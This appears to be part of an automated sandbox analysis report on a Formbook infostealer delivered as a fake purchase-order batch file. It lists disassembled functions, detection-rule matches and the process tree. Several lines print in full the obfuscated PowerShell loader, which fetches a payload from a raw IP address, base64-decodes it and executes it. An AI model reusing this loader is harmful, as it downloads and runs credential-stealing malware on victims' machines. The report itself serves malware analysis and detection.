        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04B6FF6315_2_04B6FF63
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04B298B215_2_04B298B2
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04AC688215_2_04AC6882
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04B678F315_2_04B678F3
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04AB28C015_2_04AB28C0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04B618DA15_2_04B618DA
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04B5083515_2_04B50835
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04AB380015_2_04AB3800
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04A9686815_2_04A96868
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04B6F87215_2_04B6F872
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04AB987015_2_04AB9870
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04ACB87015_2_04ACB870
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04AAE9A015_2_04AAE9A0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04B6E9A615_2_04B6E9A6
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04ACFAA015_2_04ACFAA0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04B6FA8915_2_04B6FA89
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04B6CA1315_2_04B6CA13
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04B6EA5B15_2_04B6EA5B
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04B24BC015_2_04B24BC0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04B6FB2E15_2_04B6FB2E
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04AB0B1015_2_04AB0B10
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_02AB307015_2_02AB3070
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_02AAC2E015_2_02AAC2E0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_02AAC2D615_2_02AAC2D6
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_02AAE26015_2_02AAE260
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_02ACB01015_2_02ACB010
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_02AAE04015_2_02AAE040
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_02AB47EC15_2_02AB47EC
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_02AB47F015_2_02AB47F0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_02AAC42915_2_02AAC429
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: String function: 04A9B910 appears 266 times
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: String function: 04AF7BE4 appears 88 times
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: String function: 04B2EF10 appears 105 times
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: String function: 04AE5050 appears 35 times
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: String function: 04B1E692 appears 84 times
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 23335050 appears 35 times
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 2336E692 appears 84 times
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 23347BE4 appears 84 times
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 2337EF10 appears 98 times
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 232EB910 appears 265 times
        Source: amsi32_2316.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: 00000010.00000002.21017259081.0000000001340000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 0000000F.00000002.21015350999.0000000002AA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 0000000F.00000002.21018295685.00000000046C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 0000000F.00000002.21017838349.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 0000000C.00000002.20312027456.0000000003040000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: Process Memory Space: powershell.exe PID: 3124, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: Process Memory Space: powershell.exe PID: 2316, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: classification engineClassification label: mal100.troj.spyw.evad.winBAT@20/10@6/4
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Prezygomatic.BenJump to behavior
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7464:304:WilStaging_02
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8040:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7464:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8040:120:WilError_03
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r4pf1vrk.5pf.ps1Jump to behavior
        Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\PO_La-Tanerie04180240124.bat" "
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=3124
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=2316
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
        Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
        Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\PO_La-Tanerie04180240124.bat" "
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Ruthenious = 1;$dirkningernes='Substrin';$dirkningernes+='g';Function Sonedkkets($Fumingly){$Programmeringsbegrebet=$Fumingly.Length-$Ruthenious;For($Ozonify=1; $Ozonify -lt $Programmeringsbegrebet; $Ozonify+=(2)){$Hjul+=$Fumingly.$dirkningernes.Invoke($Ozonify, $Ruthenious);}$Hjul;}function Innovative($Oryctognosy238){. ($Complexes) ($Oryctognosy238);}$Glasskaaret=Sonedkkets ' MHoKz.iBlFlEa /U5S. 0S A(IW.i nKdDo,w s, BN T ,1 0 .S0C;, KWIiUn 6T4F; .x,6,4S;, TrBv :T1I2B1S.C0E)H ,GEeAc kDo /b2O0 1 0A0 1 0 1F F.i rReTf orxL/.1 2.1O. 0 ';$Beshaming=Sonedkkets ' UCsHeUr -MA.g.e,n.tB ';$Bladfod=Sonedkkets ' hOt t pP:a/S/,8 7,.C1T2v1L. 1R0R5L. 1 6O3H/.L i,cPeUn c.eJsA.,t.trf ';$Gruppemedlemmernes=Sonedkkets 'S> ';$Complexes=Sonedkkets 'EiReAxB ';$Gambia = Sonedkkets ' e,cTh o B%Aa,pEpOdOa t,a.%S\ P,rWeSzSyCg,oVmMaIt.iLc,.AB.e n, u& & .eLcDhBo. $. ';Innovative (Sonedkkets 'B$CgSlSo bBaGl :.UUn wGa r.r,aAnCt a b.i lti tDy =D(UcAm,df /IcL A$ GOa.m b imaV) ');Innovative (Sonedkkets 'T$ g lFoDb a l.:MHKe e l.t a,p,2 6m= $BB,l a dIfSoUd .ssfp lCi t.(V$OGUr u p,p e mBe dSlAeCm m ePrhnKe s.) ');$Bladfod=$Heeltap26[0];Innovative (Sonedkkets ',$TgPl o bGaDlO:,RPr b l a,d eTs =MNTe w -AOSb,j eUc t AS.y sSt e.m .AN e t .RWFeMbtC l i eLn t, ');Innovative (Sonedkkets ' $ RArDb.lDa.d,eHs,..HGe.aSdCe.rLs [ $kB.ess.hKa mSiNnOgT]V=K$ GIlFaAsAsKk a.a r e t ');$Forvanskes=Sonedkkets ' RHrEbLlpaUdPeTsp.AD oTwSnPlmoOaSdSFCiCl e (s$.BMl.aDdPf oFdT,B$DHPoCo.pHoUe,s,), ';$Forvanskes=$Unwarrantability[1]+$Forvanskes;$Hoopoes=$Unwarrantability[0];Innovative (Sonedkkets ' $.gAlZoSb a lA:FGFrAa vRh j eN=D(MTTe,s t -SP a tFh $AHRo o.pAoRe sS)A ');while (!$Gravhje) {Innovative (Sonedkkets 'P$ gal o bTa lL: S t uKefa rPr e s.tmeFn s =S$PtRrTuBe. ') ;Innovative $Forvanskes;Innovative (Sonedkkets ',S.tTa rCtD-ISDl eWe pA ,4 ');Innovative (Sonedkkets 'B$Eg,lKo.b a,l :WGIrLa,v.hVj el=.( T ecsUtM-BPRa t h G$LHSoSoGpcoPeSs,)E ') ;Innovative (Sonedkkets ' $ gDl o b.aAlD:,S.u,pReNr fEiHnSi.c aBlO=S$ng,l.oFb.a.lM:RVDi tUh aMr,d.tFs,+ +A%.$,Hpe.e l tna p 2K6,..cSoBu nCt. ') ;$Bladfod=$Heeltap26[$Superfinical];}Innovative (Sonedkkets 'F$.gSlMo bAa l,:BGFu l i xG ,=E BG,eWt -PC oDnDt,eGnMt $UH oBoBp oPeTsU ');Innovative (Sonedkkets 'E$.gLlRolb.aOlt: T.hSo,r a cUo.sut rDaTc aan ,=. k[RS y s t e mP.JCUoPnCv eBr t ]M:B: FFrCoTm,B,aKsMeE6G4IS.tSrTiFn,g.(S$FG u lRimx.)U ');Innovative (Sonedkkets ',$Mg lVo b,a lK: G a r,dIe nTpBa rUt iQeBnNe, = ,[BS ySsDt eNm . TDe xUt .UEUnPc,oSd.ifnLgL]u:A: A S C,IPI,. G eHt S.t r,i n g ( $ TKhNoSr.a cVoIsotnr aSchaSn )U ');Innovative (Sonedkkets 'E$,gPlLo.b aMl.: FDd e,vBaSr e i n d.utsStSr i e nSsP= $pG a.r d,eCnLp aVr,t.i,eUn e . s,uRbUsSt r i.n gE( 2O9A8.8s7 2 ,S2.6 1S1N8E)e ');Innovative $Fdevareindustriens;"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Prezygomatic.Ben && echo $"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Ruthenious = 1;$dirkningernes='Substrin';$dirkningernes+='g';Function Sonedkkets($Fumingly){$Programmeringsbegrebet=$Fumingly.Length-$Ruthenious;For($Ozonify=1; $Ozonify -lt $Programmeringsbegrebet; $Ozonify+=(2)){$Hjul+=$Fumingly.$dirkningernes.Invoke($Ozonify, $Ruthenious);}$Hjul;}function Innovative($Oryctognosy238){. ($Complexes) ($Oryctognosy238);}$Glasskaaret=Sonedkkets ' MHoKz.iBlFlEa /U5S. 0S A(IW.i nKdDo,w s, BN T ,1 0 .S0C;, KWIiUn 6T4F; .x,6,4S;, TrBv :T1I2B1S.C0E)H ,GEeAc kDo /b2O0 1 0A0 1 0 1F F.i rReTf orxL/.1 2.1O. 0 ';$Beshaming=Sonedkkets ' UCsHeUr -MA.g.e,n.tB ';$Bladfod=Sonedkkets ' hOt t pP:a/S/,8 7,.C1T2v1L. 1R0R5L. 1 6O3H/.L i,cPeUn c.eJsA.,t.trf ';$Gruppemedlemmernes=Sonedkkets 'S> ';$Complexes=Sonedkkets 'EiReAxB ';$Gambia = Sonedkkets ' e,cTh o B%Aa,pEpOdOa t,a.%S\ P,rWeSzSyCg,oVmMaIt.iLc,.AB.e n, u& & .eLcDhBo. $. ';Innovative (Sonedkkets 'B$CgSlSo bBaGl :.UUn wGa r.r,aAnCt a b.i lti tDy =D(UcAm,df /IcL A$ GOa.m b imaV) ');Innovative (Sonedkkets 'T$ g lFoDb a l.:MHKe e l.t a,p,2 6m= $BB,l a dIfSoUd .ssfp lCi t.(V$OGUr u p,p e mBe dSlAeCm m ePrhnKe s.) ');$Bladfod=$Heeltap26[0];Innovative (Sonedkkets ',$TgPl o bGaDlO:,RPr b l a,d eTs =MNTe w -AOSb,j eUc t AS.y sSt e.m .AN e t .RWFeMbtC l i eLn t, ');Innovative (Sonedkkets ' $ RArDb.lDa.d,eHs,..HGe.aSdCe.rLs [ $kB.ess.hKa mSiNnOgT]V=K$ GIlFaAsAsKk a.a r e t ');$Forvanskes=Sonedkkets ' RHrEbLlpaUdPeTsp.AD oTwSnPlmoOaSdSFCiCl e (s$.BMl.aDdPf oFdT,B$DHPoCo.pHoUe,s,), ';$Forvanskes=$Unwarrantability[1]+$Forvanskes;$Hoopoes=$Unwarrantability[0];Innovative (Sonedkkets ' $.gAlZoSb a lA:FGFrAa vRh j eN=D(MTTe,s t -SP a tFh $AHRo o.pAoRe sS)A ');while (!$Gravhje) {Innovative (Sonedkkets 'P$ gal o bTa lL: S t uKefa rPr e s.tmeFn s =S$PtRrTuBe. ') ;Innovative $Forvanskes;Innovative (Sonedkkets ',S.tTa rCtD-ISDl eWe pA ,4 ');Innovative (Sonedkkets 'B$Eg,lKo.b a,l :WGIrLa,v.hVj el=.( T ecsUtM-BPRa t h G$LHSoSoGpcoPeSs,)E ') ;Innovative (Sonedkkets ' $ gDl o b.aAlD:,S.u,pReNr fEiHnSi.c aBlO=S$ng,l.oFb.a.lM:RVDi tUh aMr,d.tFs,+ +A%.$,Hpe.e l tna p 2K6,..cSoBu nCt. ') ;$Bladfod=$Heeltap26[$Superfinical];}Innovative (Sonedkkets 'F$.gSlMo bAa l,:BGFu l i xG ,=E BG,eWt -PC oDnDt,eGnMt $UH oBoBp oPeTsU ');Innovative (Sonedkkets 'E$.gLlRolb.aOlt: T.hSo,r a cUo.sut rDaTc aan ,=. k[RS y s t e mP.JCUoPnCv eBr t ]M:B: FFrCoTm,B,aKsMeE6G4IS.tSrTiFn,g.(S$FG u lRimx.)U ');Innovative (Sonedkkets ',$Mg lVo b,a lK: G a r,dIe nTpBa rUt iQeBnNe, = ,[BS ySsDt eNm . TDe xUt .UEUnPc,oSd.ifnLgL]u:A: A S C,IPI,. G eHt S.t r,i n g ( $ TKhNoSr.a cVoIsotnr aSchaSn )U ');Innovative (Sonedkkets 'E$,gPlLo.b aMl.: FDd e,vBaSr e i n d.utsStSr i e nSsP= $pG a.r d,eCnLp aVr,t.i,eUn e . s,uRbUsSt r i.n gE( 2O9A8.8s7 2 ,S2.6 1S1N8E)e ');Innovative $Fdevareindustriens;"
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Prezygomatic.Ben && echo $"
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeProcess created: C:\Windows\SysWOW64\AtBroker.exe "C:\Windows\SysWOW64\AtBroker.exe"
        Source: unknownProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
        Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
        Source: C:\Windows\SysWOW64\AtBroker.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
        Source: unknownProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Ruthenious = 1;$dirkningernes='Substrin';$dirkningernes+='g';Function Sonedkkets($Fumingly){$Programmeringsbegrebet=$Fumingly.Length-$Ruthenious;For($Ozonify=1; $Ozonify -lt $Programmeringsbegrebet; $Ozonify+=(2)){$Hjul+=$Fumingly.$dirkningernes.Invoke($Ozonify, $Ruthenious);}$Hjul;}function Innovative($Oryctognosy238){. ($Complexes) ($Oryctognosy238);}$Glasskaaret=Sonedkkets ' MHoKz.iBlFlEa /U5S. 0S A(IW.i nKdDo,w s, BN T ,1 0 .S0C;, KWIiUn 6T4F; .x,6,4S;, TrBv :T1I2B1S.C0E)H ,GEeAc kDo /b2O0 1 0A0 1 0 1F F.i rReTf orxL/.1 2.1O. 0 ';$Beshaming=Sonedkkets ' UCsHeUr -MA.g.e,n.tB ';$Bladfod=Sonedkkets ' hOt t pP:a/S/,8 7,.C1T2v1L. 1R0R5L. 1 6O3H/.L i,cPeUn c.eJsA.,t.trf ';$Gruppemedlemmernes=Sonedkkets 'S> ';$Complexes=Sonedkkets 'EiReAxB ';$Gambia = Sonedkkets ' e,cTh o B%Aa,pEpOdOa t,a.%S\ P,rWeSzSyCg,oVmMaIt.iLc,.AB.e n, u& & .eLcDhBo. $. ';Innovative (Sonedkkets 'B$CgSlSo bBaGl :.UUn wGa r.r,aAnCt a b.i lti tDy =D(UcAm,df /IcL A$ GOa.m b imaV) ');Innovative (Sonedkkets 'T$ g lFoDb a l.:MHKe e l.t a,p,2 6m= $BB,l a dIfSoUd .ssfp lCi t.(V$OGUr u p,p e mBe dSlAeCm m ePrhnKe s.) ');$Bladfod=$Heeltap26[0];Innovative (Sonedkkets ',$TgPl o bGaDlO:,RPr b l a,d eTs =MNTe w -AOSb,j eUc t AS.y sSt e.m .AN e t .RWFeMbtC l i eLn t, ');Innovative (Sonedkkets ' $ RArDb.lDa.d,eHs,..HGe.aSdCe.rLs [ $kB.ess.hKa mSiNnOgT]V=K$ GIlFaAsAsKk a.a r e t ');$Forvanskes=Sonedkkets ' RHrEbLlpaUdPeTsp.AD oTwSnPlmoOaSdSFCiCl e (s$.BMl.aDdPf oFdT,B$DHPoCo.pHoUe,s,), ';$Forvanskes=$Unwarrantability[1]+$Forvanskes;$Hoopoes=$Unwarrantability[0];Innovative (Sonedkkets ' $.gAlZoSb a lA:FGFrAa vRh j eN=D(MTTe,s t -SP a tFh $AHRo o.pAoRe sS)A ');while (!$Gravhje) {Innovative (Sonedkkets 'P$ gal o bTa lL: S t uKefa rPr e s.tmeFn s =S$PtRrTuBe. ') ;Innovative $Forvanskes;Innovative (Sonedkkets ',S.tTa rCtD-ISDl eWe pA ,4 ');Innovative (Sonedkkets 'B$Eg,lKo.b a,l :WGIrLa,v.hVj el=.( T ecsUtM-BPRa t h G$LHSoSoGpcoPeSs,)E ') ;Innovative (Sonedkkets ' $ gDl o b.aAlD:,S.u,pReNr fEiHnSi.c aBlO=S$ng,l.oFb.a.lM:RVDi tUh aMr,d.tFs,+ +A%.$,Hpe.e l tna p 2K6,..cSoBu nCt. ') ;$Bladfod=$Heeltap26[$Superfinical];}Innovative (Sonedkkets 'F$.gSlMo bAa l,:BGFu l i xG ,=E BG,eWt -PC oDnDt,eGnMt $UH oBoBp oPeTsU ');Innovative (Sonedkkets 'E$.gLlRolb.aOlt: T.hSo,r a cUo.sut rDaTc aan ,=. k[RS y s t e mP.JCUoPnCv eBr t ]M:B: FFrCoTm,B,aKsMeE6G4IS.tSrTiFn,g.(S$FG u lRimx.)U ');Innovative (Sonedkkets ',$Mg lVo b,a lK: G a r,dIe nTpBa rUt iQeBnNe, = ,[BS ySsDt eNm . TDe xUt .UEUnPc,oSd.ifnLgL]u:A: A S C,IPI,. G eHt S.t r,i n g ( $ TKhNoSr.a cVoIsotnr aSchaSn )U ');Innovative (Sonedkkets 'E$,gPlLo.b aMl.: FDd e,vBaSr e i n d.utsStSr i e nSsP= $pG a.r d,eCnLp aVr,t.i,eUn e . s,uRbUsSt r i.n gE( 2O9A8.8s7 2 ,S2.6 1S1N8E)e ');Innovative $Fdevareindustriens;"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Prezygomatic.Ben && echo $"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Ruthenious = 1;$dirkningernes='Substrin';$dirkningernes+='g';Function Sonedkkets($Fumingly){$Programmeringsbegrebet=$Fumingly.Length-$Ruthenious;For($Ozonify=1; $Ozonify -lt $Programmeringsbegrebet; $Ozonify+=(2)){$Hjul+=$Fumingly.$dirkningernes.Invoke($Ozonify, $Ruthenious);}$Hjul;}function Innovative($Oryctognosy238){. ($Complexes) ($Oryctognosy238);}$Glasskaaret=Sonedkkets ' MHoKz.iBlFlEa /U5S. 0S A(IW.i nKdDo,w s, BN T ,1 0 .S0C;, KWIiUn 6T4F; .x,6,4S;, TrBv :T1I2B1S.C0E)H ,GEeAc kDo /b2O0 1 0A0 1 0 1F F.i rReTf orxL/.1 2.1O. 0 ';$Beshaming=Sonedkkets ' UCsHeUr -MA.g.e,n.tB ';$Bladfod=Sonedkkets ' hOt t pP:a/S/,8 7,.C1T2v1L. 1R0R5L. 1 6O3H/.L i,cPeUn c.eJsA.,t.trf ';$Gruppemedlemmernes=Sonedkkets 'S> ';$Complexes=Sonedkkets 'EiReAxB ';$Gambia = Sonedkkets ' e,cTh o B%Aa,pEpOdOa t,a.%S\ P,rWeSzSyCg,oVmMaIt.iLc,.AB.e n, u& & .eLcDhBo. $. ';Innovative (Sonedkkets 'B$CgSlSo bBaGl :.UUn wGa r.r,aAnCt a b.i lti tDy =D(UcAm,df /IcL A$ GOa.m b imaV) ');Innovative (Sonedkkets 'T$ g lFoDb a l.:MHKe e l.t a,p,2 6m= $BB,l a dIfSoUd .ssfp lCi t.(V$OGUr u p,p e mBe dSlAeCm m ePrhnKe s.) ');$Bladfod=$Heeltap26[0];Innovative (Sonedkkets ',$TgPl o bGaDlO:,RPr b l a,d eTs =MNTe w -AOSb,j eUc t AS.y sSt e.m .AN e t .RWFeMbtC l i eLn t, ');Innovative (Sonedkkets ' $ RArDb.lDa.d,eHs,..HGe.aSdCe.rLs [ $kB.ess.hKa mSiNnOgT]V=K$ GIlFaAsAsKk a.a r e t ');$Forvanskes=Sonedkkets ' RHrEbLlpaUdPeTsp.AD oTwSnPlmoOaSdSFCiCl e (s$.BMl.aDdPf oFdT,B$DHPoCo.pHoUe,s,), ';$Forvanskes=$Unwarrantability[1]+$Forvanskes;$Hoopoes=$Unwarrantability[0];Innovative (Sonedkkets ' $.gAlZoSb a lA:FGFrAa vRh j eN=D(MTTe,s t -SP a tFh $AHRo o.pAoRe sS)A ');while (!$Gravhje) {Innovative (Sonedkkets 'P$ gal o bTa lL: S t uKefa rPr e s.tmeFn s =S$PtRrTuBe. ') ;Innovative $Forvanskes;Innovative (Sonedkkets ',S.tTa rCtD-ISDl eWe pA ,4 ');Innovative (Sonedkkets 'B$Eg,lKo.b a,l :WGIrLa,v.hVj el=.( T ecsUtM-BPRa t h G$LHSoSoGpcoPeSs,)E ') ;Innovative (Sonedkkets ' $ gDl o b.aAlD:,S.u,pReNr fEiHnSi.c aBlO=S$ng,l.oFb.a.lM:RVDi tUh aMr,d.tFs,+ +A%.$,Hpe.e l tna p 2K6,..cSoBu nCt. ') ;$Bladfod=$Heeltap26[$Superfinical];}Innovative (Sonedkkets 'F$.gSlMo bAa l,:BGFu l i xG ,=E BG,eWt -PC oDnDt,eGnMt $UH oBoBp oPeTsU ');Innovative (Sonedkkets 'E$.gLlRolb.aOlt: T.hSo,r a cUo.sut rDaTc aan ,=. k[RS y s t e mP.JCUoPnCv eBr t ]M:B: FFrCoTm,B,aKsMeE6G4IS.tSrTiFn,g.(S$FG u lRimx.)U ');Innovative (Sonedkkets ',$Mg lVo b,a lK: G a r,dIe nTpBa rUt iQeBnNe, = ,[BS ySsDt eNm . TDe xUt .UEUnPc,oSd.ifnLgL]u:A: A S C,IPI,. G eHt S.t r,i n g ( $ TKhNoSr.a cVoIsotnr aSchaSn )U ');Innovative (Sonedkkets 'E$,gPlLo.b aMl.: FDd e,vBaSr e i n d.utsStSr i e nSsP= $pG a.r d,eCnLp aVr,t.i,eUn e . s,uRbUsSt r i.n gE( 2O9A8.8s7 2 ,S2.6 1S1N8E)e ');Innovative $Fdevareindustriens;"Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Prezygomatic.Ben && echo $"Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeProcess created: C:\Windows\SysWOW64\AtBroker.exe "C:\Windows\SysWOW64\AtBroker.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
